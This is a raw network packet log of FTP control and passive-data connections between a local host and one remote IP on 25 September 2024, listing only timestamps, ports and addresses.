                              Sep 25, 2024 14:42:46.104639053 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:46.109493017 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:46.459978104 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:46.463820934 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:46.468727112 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:46.799571037 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:46.804580927 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:46.809519053 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:47.144850016 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:47.145196915 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:47.150094032 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:47.487152100 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:47.487413883 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:47.492291927 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:47.994132996 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:47.995132923 CEST5543154539192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:48.045166016 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:48.223854065 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:48.223906994 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:48.225296974 CEST5453955431110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:48.225368977 CEST5543154539192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:48.225577116 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:48.232645035 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:49.076314926 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:49.076788902 CEST5543154539192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:49.076852083 CEST5543154539192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:49.081737995 CEST5453955431110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:49.081945896 CEST5453955431110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:49.082015038 CEST5543154539192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:49.123198032 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:49.412595034 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:49.467031002 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:49.474122047 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:49.478949070 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:49.805684090 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:49.809808969 CEST5543260779192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:49.814781904 CEST6077955432110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:49.814888954 CEST5543260779192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:49.817501068 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:49.822446108 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:50.657113075 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:50.657381058 CEST5543260779192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:50.657426119 CEST5543260779192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:50.662185907 CEST6077955432110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:50.662513018 CEST6077955432110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:50.662565947 CEST5543260779192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:50.701482058 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:50.996732950 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:50.997369051 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:51.002423048 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:51.330818892 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:51.331338882 CEST5543360205192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:51.336314917 CEST6020555433110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:51.336386919 CEST5543360205192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:51.336488008 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:51.341357946 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:52.186347008 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:52.187323093 CEST5543360205192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:52.192653894 CEST6020555433110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:52.192773104 CEST5543360205192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:52.232615948 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:52.600034952 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:52.600404978 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:52.605443954 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:52.978665113 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:52.979338884 CEST6475650701192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:53.001146078 CEST5070164756110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:53.001272917 CEST6475650701192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:53.001554966 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:53.009335995 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:53.906737089 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:53.907077074 CEST6475650701192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:53.920011997 CEST5070164756110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:53.921340942 CEST5070164756110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:53.921406031 CEST6475650701192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:53.951358080 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:42:54.273318052 CEST2155430110.4.45.197192.168.2.9
                              Sep 25, 2024 14:42:54.326323032 CEST5543021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:43:56.065356970 CEST6502421192.168.2.9110.4.45.197
                              Sep 25, 2024 14:43:56.095133066 CEST2165024110.4.45.197192.168.2.9
                              Sep 25, 2024 14:43:56.095269918 CEST6502421192.168.2.9110.4.45.197
                              Sep 25, 2024 14:43:56.095596075 CEST6502421192.168.2.9110.4.45.197
                              Sep 25, 2024 14:43:56.126966953 CEST2165024110.4.45.197192.168.2.9
                              Sep 25, 2024 14:43:56.127042055 CEST6502421192.168.2.9110.4.45.197
                              Sep 25, 2024 14:43:59.851809025 CEST6502521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:43:59.874130011 CEST2165025110.4.45.197192.168.2.9
                              Sep 25, 2024 14:43:59.874233007 CEST6502521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:43:59.874547005 CEST6502521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:43:59.910603046 CEST2165025110.4.45.197192.168.2.9
                              Sep 25, 2024 14:43:59.910676003 CEST6502521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:10.279552937 CEST6502621192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:10.285670996 CEST2165026110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:10.289047003 CEST6502621192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:10.292882919 CEST6502621192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:10.298048019 CEST2165026110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:10.301027060 CEST6502621192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:13.491029978 CEST6502721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:13.496404886 CEST2165027110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:13.496479034 CEST6502721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:13.499854088 CEST6502721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:13.504887104 CEST2165027110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:13.505044937 CEST6502721192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:18.747637033 CEST6502821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:18.752618074 CEST2165028110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:18.752832890 CEST6502821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:18.752950907 CEST6502821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:18.758033991 CEST2165028110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:18.758214951 CEST6502821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:23.896459103 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:23.903240919 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:23.903312922 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:24.828048944 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:24.831254959 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:24.836222887 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:25.193777084 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:25.199153900 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:25.204085112 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:25.588510990 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:25.588809013 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:25.593749046 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:25.698460102 CEST6503021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:25.703501940 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:25.703572989 CEST6503021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:26.016300917 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:26.016527891 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:26.021433115 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:26.393462896 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:26.395428896 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:26.402354956 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:26.607925892 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:26.611191988 CEST6503021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:26.616337061 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:26.777072906 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:26.777359962 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:26.782303095 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:27.000193119 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:27.000380993 CEST6503021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:27.006774902 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:27.156686068 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:27.160962105 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:27.166163921 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:27.169065952 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:27.169186115 CEST6502921192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:27.174371004 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:27.466305971 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:27.466516972 CEST6503021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:27.472191095 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:27.876199961 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:27.876458883 CEST6503021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.077284098 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.077353001 CEST6503021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.078520060 CEST2165030110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.106301069 CEST2165029110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.106583118 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.111450911 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111460924 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111500978 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.111524105 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.111542940 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111552954 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111599922 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111601114 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.111608982 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111664057 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111673117 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111675978 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.111738920 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.111758947 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111768961 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.111815929 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:44:28.116396904 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.116406918 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.116415977 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.116425037 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.116435051 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.116446018 CEST5123765031110.4.45.197192.168.2.9
                              Sep 25, 2024 14:44:28.116456032 CEST6503151237192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:03.124798059 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.124813080 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.124871016 CEST6504658978192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:03.126276016 CEST6504658978192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:03.126605988 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.126619101 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.126646996 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.126665115 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.126720905 CEST6504658978192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:03.130489111 CEST6504658978192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:03.138257980 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.139955044 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.140079021 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.140084982 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.140734911 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.140801907 CEST6504658978192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:03.142123938 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.142129898 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.144275904 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.157512903 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.162501097 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.169303894 CEST6504658978192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:03.237051964 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:04.061877012 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:04.233382940 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:05.003916979 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:05.015419960 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:05.407233953 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:05.408917904 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:05.417830944 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:05.418198109 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:05.418234110 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:05.424572945 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.289006948 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.290004969 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.304903030 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.304936886 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.304965019 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.304965019 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.305008888 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.305205107 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.305248022 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.305275917 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.305305958 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.305473089 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.305521965 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.305521965 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.305576086 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.305617094 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.305646896 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.305690050 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.307404041 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.307456970 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.324974060 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.324990988 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.325005054 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.325027943 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.325062037 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.325078011 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.325412035 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.325424910 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.325438023 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.325449944 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.325483084 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.325493097 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.325495005 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.325535059 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.325581074 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.326847076 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.326910973 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.328279018 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.328371048 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.340783119 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.340845108 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.340904951 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.340918064 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.341016054 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.341162920 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.341222048 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.341486931 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.341499090 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.342278004 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.342890024 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.350264072 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.350294113 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.350322008 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.350333929 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.351314068 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.351342916 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.351370096 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.351382017 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.351444006 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.351516008 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.420878887 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:07.118069887 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:07.233377934 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:09.978199005 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:09.990195990 CEST6504821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:10.324100971 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:10.324153900 CEST2165048110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:10.324235916 CEST6504821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:10.324565887 CEST6504821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:10.339101076 CEST2165048110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:10.350428104 CEST2165048110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:10.350492001 CEST6504821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:10.707081079 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:10.710944891 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:10.735255003 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:10.735379934 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:10.735522032 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:10.769364119 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.621846914 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.622195959 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.627837896 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627852917 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627866983 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627880096 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627891064 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627897024 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.627904892 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627918959 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627923012 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.627932072 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627943993 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627948999 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.627958059 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627985954 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.628016949 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.635231972 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.635262966 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.635286093 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.635289907 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.635318995 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.635329008 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.635354996 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.635377884 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.635642052 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.635766029 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.637626886 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.637655973 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.637681961 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.637723923 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.638622046 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.638681889 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.639272928 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.639354944 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.640543938 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.640574932 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.640603065 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.642788887 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.642817020 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.642844915 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.644583941 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.644742012 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.644768953 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.644795895 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.645900011 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.645929098 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.646581888 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.647202969 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.647229910 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.648854017 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.648883104 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.648910046 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.648950100 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.648977041 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.649003983 CEST5285165049110.4.45.197192.168.2.9
